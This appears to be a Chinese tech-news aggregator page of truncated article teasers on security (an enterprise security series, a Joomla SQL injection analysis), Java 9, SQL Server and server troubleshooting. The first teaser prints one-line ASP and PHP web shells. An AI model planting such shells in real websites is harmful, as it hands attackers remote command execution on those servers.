asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST);?> aspx一句话 <scri...
企业安全管理(一) – ayazero
http://drops.wooyun.org/tips/6398 0x00 安全行业的第三流派-CSOs 目前在大多数行业后加入者的眼中“二进制”和“脚本”流派广为人知,虽然他们是安全行业的主力军,...
神兵利刃
修复Firefox(火狐)浏览器常用安全测试插件Liv
Live Http headers是Firefox下Http头信息捕获利器,常用于安全测试。但不幸的是Replay功能无法在最近版本的Firefox浏览器(35.0.1)中工作,我决定在插件的官方版本...
Oracle宣布更多的Java 9 新特性
随着Oracle确认了其余的4个Java 9特性,下一代Java的计划开始变得更清晰了,Oracle已经公布了第二套Java 9特性。自从Oracle在今年早些时候宣布了3个新...
快讯信息
丁香园从哈尔滨到杭州的故事
虎嗅注:由“亚布力”引发的关于东北经济环境的讨论一直都没有结束。丁香园创始人、董事长李天天在这篇文章里回顾了自己在哈尔滨初创丁香园的故事,他的思考可能也是每一个跟东北商业相关的人的思考。本文转自“商界...
SQL Server 查询处理中的各个阶段(SQL执行顺序)示例_MsSql
在大数编程语言中,代码按编码顺序被处理,但是在SQL语言中,第一个被处理的子句是FROM子句,尽管SELECT语句第一个出现,但是几乎总是最后被处理。每个步骤都会产生一个虚拟表,该虚拟表被用作下一个步...
快讯信息
金融市场可以用大数据技术预测吗?
从过去的一年到现在,人工智能和大数据技术给了我们许多的惊喜。数据科学家成功预测9项奥斯卡奖归属,人工智能Cortana成功预测世界杯十几场比赛,就连刚结束不久的...
WooYun-Drops
Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析 – RickGray
http://drops.wooyun.org/papers/9979 昨日,Joomla CMS发布新版本3.4.5,该版本修复了一个高危的SQL注入漏洞,3.2至3.4.4版本都受到影响。攻击者通...
脚本语言
11 个用来创建图形和图表的 JavaScript 工具包
文章基本上是以引导的方式向你介绍最流行最有成效的JS工具包,用来制作图表和图形。概述了这些工具包到底能为你做什么。如果你是一个开发者,寻求最新的开发工具是工作中必不可少的部分,接下来的这些工具包绝...
系统文档
记录Debian系统云服务器带宽占用过高导致访问瘫痪
共计 300 个字符,预计需要花费 1 分钟才能阅读完成。 问题出现 个人博客页面访问缓慢,云服务器告警信息,外网带宽占用超过95% 问题定位 针对Debian机器,安装iftop工具(这是一款Lin...
